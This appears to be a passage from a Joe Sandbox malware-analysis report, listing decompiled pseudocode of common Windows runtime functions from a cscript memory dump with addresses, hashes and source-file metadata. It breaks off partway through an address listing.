Uniqueness

Uniqueness Score: -1.00%

Function 054C8A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E054C8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x55ad360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E054FB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E054CE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x5491180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E054E1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E054F3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E054C8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x054c8a0a
0x054c8a1c
0x054c8a23
0x054c8a2e
0x054c8a30
0x054c8a36
0x054c8a3c
0x054c8a3e
0x054c8a4a
0x054c8a52
0x054c8a9c
0x054c8aae
0x054c8a58
0x054c8a5e
0x054c8a6a
0x054c8a6f
0x054c8a75
0x054c8a7d
0x054c8a85
0x054c8a86
0x054c8a89
0x054c8a93
0x054c8a99
0x054c8a9b
0x00000000
0x054c8aaf
0x054c8abe
0x054c8ac3
0x054c8acb
0x054c8ad7
0x054c8ae0
0x054c8af1
0x00000000
0x054c8af1
0x054c8acd
0x054c8ad5
0x054c8afb
0x054c8afd
0x054c8aff
0x054c8b07
0x054c8b22
0x054c8b24
0x054c8b2a
0x054c8b2e
0x054c8b3f
0x054c8b78
0x054c8b41
0x054c8b52
0x054c8b54
0x054c8b5c
0x054c8b74
0x054c8b74
0x054c8b5c
0x054c8b3f
0x054c8b5e
0x054c8b61
0x054c8b64
0x054c8b64
0x054c8b6c
0x054c8b6c
0x054c8b11
0x05519cd5
0x05519cd5
0x054c8b17
0x054c8b1a
0x054c8b1a
0x00000000
0x054c8ad5
0x054c8a89

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9b962077b93be62f146071c795409e2397623cf469a741fc651ae8cde126fb8
Instruction ID: 273f870c8697c2ea5c6b2414383710a22159e617c6b36d4223e47f85e3fe702b
Opcode Fuzzy Hash: b9b962077b93be62f146071c795409e2397623cf469a741fc651ae8cde126fb8
Instruction Fuzzy Hash: A64153B5A402289BDB64DF55C888AFABBB5FB84300F1045EFE81997351E7719E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0557FDE2, Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0557FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0557FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E05580A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E054D7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E05571608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E05582B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0557C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0557DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E054D7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0557A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x0557fde7
0x0557fde8
0x0557fdec
0x0557fdee
0x0557fdf5
0x0557fdf7
0x0557fdfc
0x0557fe19
0x0557fe22
0x0557fe26
0x0557fec6
0x0557fecd
0x0557fed5
0x0557fee7
0x0557fed7
0x0557fee0
0x0557fee0
0x0557feef
0x0557ff00
0x0557ff02
0x0557ff07
0x0557ff07
0x00000000
0x0557feef
0x0557fe33
0x0557fe55
0x0557fe59
0x0557fe5b
0x0557fe5e
0x0557fe69
0x0557fe6d
0x0557fe6d
0x0557fe69
0x0557fe35
0x0557fe41
0x0557fe41
0x0557fe79
0x0557fe8b
0x0557fe7b
0x0557fe84
0x0557fe84
0x0557fe93
0x00000000
0x0557fea8
0x0557feba
0x00000000
0x0557feba
0x0557fdfe
0x0557fe01
0x0557fe02
0x0557fe08
0x0557ff0c
0x0557ff14
0x0557ff14

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: efcc48f6c1b1d0e4e37ffdd94b12cc3239500699d44b7ef0e18fd8ebe46ff952
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: 9A310532304688AFD722DB78E849F6BBBEAFFC5650F184459E8468B742DA74DC41C760

Uniqueness

Uniqueness Score: -1.00%

Function 0557EA55, Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0557EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E054D2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0557E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E054BF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E054CFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0557AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0557BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E054D7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0556FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E054CFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0557A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x0557ea55
0x0557ea66
0x0557ea68
0x0557ea6c
0x0557ea6f
0x0557ea72
0x0557ea75
0x0557ea7a
0x0557ea7a
0x0557ea7e
0x0557ea80
0x0557ea85
0x0557ea8b
0x0557eab5
0x0557eabc
0x0557eabf
0x0557eabf
0x0557eaca
0x0557eace
0x0557ead0
0x0557eae4
0x0557eaeb
0x0557eaf0
0x0557eaf5
0x0557eb09
0x0557eb0d
0x0557eb1d
0x0557eb2d
0x0557eb38
0x0557eb3d
0x0557eb41
0x0557eb4a
0x0557eb60
0x0557eb4c
0x0557eb52
0x0557eb59
0x0557eb59
0x0557eb68
0x0557eb71
0x0557eb71
0x0557ea8d
0x0557ea8f
0x0557ea92
0x0557ea97
0x0557ea97
0x0557ea9b
0x0557ea9c
0x0557ea9e
0x0557eaa6
0x0557eaa6
0x0557eb7e

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 479e69a38da20e57c2e4f9ba98ac8516774db5b199252e501486f7cbc34caeb9
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: A031C136704709ABC719DF34D889E6BB7AAFFC4210F04496EF55687644EA34E809CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 055369A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E055369A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x55ad360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L054C6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E05536BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E054F9980() >= 0) {
							E054D2280(_t56, 0x55a8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x55a8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x55a8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E054BB6F0(0x549c338, 0x549c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E054F9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E054F95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E054CFFB0(_t68, _t77, 0x55a8778);
				}
				_pop(_t78);
				return E054FB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x055369b5
0x055369be
0x055369c3
0x055369c9
0x055369cc
0x055369d1
0x055369d3
0x055369de
0x055369e1
0x055369ea
0x055369f6
0x055369fe
0x05536a13
0x05536a14
0x05536a15
0x05536a16
0x05536a1e
0x05536a26
0x05536a31
0x05536a36
0x05536a37
0x05536a40
0x05536a49
0x05536a4a
0x05536a53
0x05536a59
0x05536a5d
0x05536a5e
0x05536a64
0x05536a67
0x05536a6a
0x05536a6d
0x05536a70
0x05536a77
0x05536a7d
0x05536a86
0x05536a89
0x05536a9c
0x05536a9f
0x05536aa2
0x05536aa5
0x05536aaf
0x05536ab1
0x05536ab8
0x05536ab9
0x05536abb
0x05536abe
0x05536ac5
0x05536ac5
0x05536aaf
0x05536a40
0x05536a26
0x055369fe
0x05536ace
0x05536ad0
0x05536ad3
0x05536ad8
0x05536adf
0x05536adf
0x05536ae8
0x05536aef
0x05536aef
0x05536af9
0x05536b06

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 224361d1848d63234787624760140af6124524576f6a59e5bc95950d664d0121
Instruction ID: 88c13e87043f14d925d1bf0dcfe22e520b752784fd9697bc3f7fcb99b7164e7f
Opcode Fuzzy Hash: 224361d1848d63234787624760140af6124524576f6a59e5bc95950d664d0121
Instruction Fuzzy Hash: 964148B1E00208AFDB14DFA9D941BEEBBF4FF48714F18812EE919A7240DB719905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 054B5210, Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E054B5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E054B52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E054F95D0();
							L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E054CEB70(_t54, 0x55a79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E054F95D0();
								L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E054CEB70(_t54, 0x55a79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E054FF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E054CEB70(_t54, 0x55a79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E054F95D0();
							L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x054b5220
0x054b5224
0x05510d13
0x05510d16
0x05510d19
0x054b522a
0x054b522a
0x054b522d
0x054b522d
0x054b5231
0x054b5235
0x054b5239
0x05510d5c
0x05510d62
0x00000000
0x00000000
0x05510d6a
0x05510d7b
0x05510d7f
0x05510d81
0x05510d84
0x05510d95
0x05510d95
0x05510d6c
0x05510d71
0x05510d71
0x05510d9a
0x00000000
0x054b524a
0x054b524a
0x054b5250
0x05510d24
0x05510d35
0x05510d39
0x05510d3b
0x05510d3e
0x05510d50
0x05510d50
0x05510d26
0x05510d2b
0x05510d2b
0x00000000
0x05510d55
0x054b5256
0x054b525b
0x054b5265
0x05510da7
0x054b526b
0x054b526e
0x054b5272
0x05510db1
0x05510db4
0x05510dc5
0x05510dc5
0x054b5272
0x054b5278
0x054b527e
0x054b528a
0x054b528c
0x054b528d
0x00000000
0x054b5280
0x054b5282
0x054b5288
0x054b529f
0x054b5292
0x00000000
0x054b5292
0x00000000
0x054b5288
0x054b527e

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73ba8d39d824b3402f1928e083365697d62d13a1d1287ed6d8693d73b070e9ce
Instruction ID: 1a1b4a3ed2e51f07ba4b07ae2d8acf8be28b67b7c97862183e6a46078074671c
Opcode Fuzzy Hash: 73ba8d39d824b3402f1928e083365697d62d13a1d1287ed6d8693d73b070e9ce
Instruction Fuzzy Hash: 7A31E931255610EFEB2ADB19C849FF6BB66FF50760F11461BE8164B1E0E770E841CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 054F3D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054F3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E054C7B60(0, _t61, 0x54911c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E054C7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L054D4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x054f3d4c
0x054f3d50
0x054f3d55
0x054f3d5e
0x0552e79a
0x00000000
0x0552e79a
0x054f3d68
0x0552e789
0x054f3d9d
0x054f3da3
0x054f3daf
0x054f3db5
0x054f3dbc
0x054f3dc4
0x054f3dc9
0x054f3dce
0x0552e7ae
0x0552e7ae
0x054f3dde
0x054f3de2
0x054f3de7
0x054f3e0d
0x054f3e13
0x054f3e16
0x054f3e1e
0x054f3e25
0x054f3e28
0x00000000
0x00000000
0x054f3e2a
0x054f3e2f
0x054f3e37
0x054f3e37
0x00000000
0x054f3e37
0x054f3e31
0x00000000
0x054f3e31
0x054f3e20
0x054f3e20
0x054f3e35
0x00000000
0x054f3de9
0x054f3de9
0x054f3de9
0x054f3dee
0x054f3dfd
0x054f3dff
0x054f3e02
0x054f3e05
0x054f3e05
0x00000000
0x054f3df0
0x054f3de7
0x0552e78f
0x0552e794
0x054f3d79
0x054f3d84
0x054f3d89
0x054f3d8e
0x00000000
0x0552e7a4
0x054f3d96
0x054f3d9a
0x00000000
0x054f3d9a
0x00000000
0x0552e794
0x054f3d6e
0x054f3d73
0x00000000
0x0552e7b5
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f49f1243310c416c82d9802ea8c4b48c0f8596b076738d08d39fc8f3b6290b1
Instruction ID: a742d8575404ccefec5fb853c78283d7dc6a2580ee8e07e3100f35764d52a049
Opcode Fuzzy Hash: 3f49f1243310c416c82d9802ea8c4b48c0f8596b076738d08d39fc8f3b6290b1
Instruction Fuzzy Hash: 58316171A05655DBC725CF2DC446ABBBBA6FF45710B0588AFE94ACB350E630D841C790

Uniqueness

Uniqueness Score: -1.00%

Function 054EA61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E054EA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x5590220);
				E0550D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x55a7b9c; // 0x0
				_t55 = L054D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0550D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x55a7b10 =  *0x55a7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x55a536c; // 0x36bab80
					if( *_t51 != 0x55a5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x55a5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x55a536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E054EA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x054ea61c
0x054ea61e
0x054ea623
0x054ea628
0x054ea62b
0x054ea62d
0x054ea648
0x054ea64a
0x054ea64f
0x05529b44
0x054ea6ec
0x054ea6f1
0x054ea6f1
0x054ea655
0x054ea657
0x054ea65a
0x054ea65d
0x054ea662
0x054ea663
0x054ea667
0x054ea668
0x054ea66d
0x054ea706
0x054ea706
0x05529bda
0x05529be6
0x05529beb
0x00000000
0x05529beb
0x054ea679
0x05529b7a
0x00000000
0x05529b7a
0x054ea683
0x054ea6f4
0x054ea6f7
0x054ea6f9
0x054ea6fd
0x054ea6a0
0x054ea6a0
0x054ea6ad
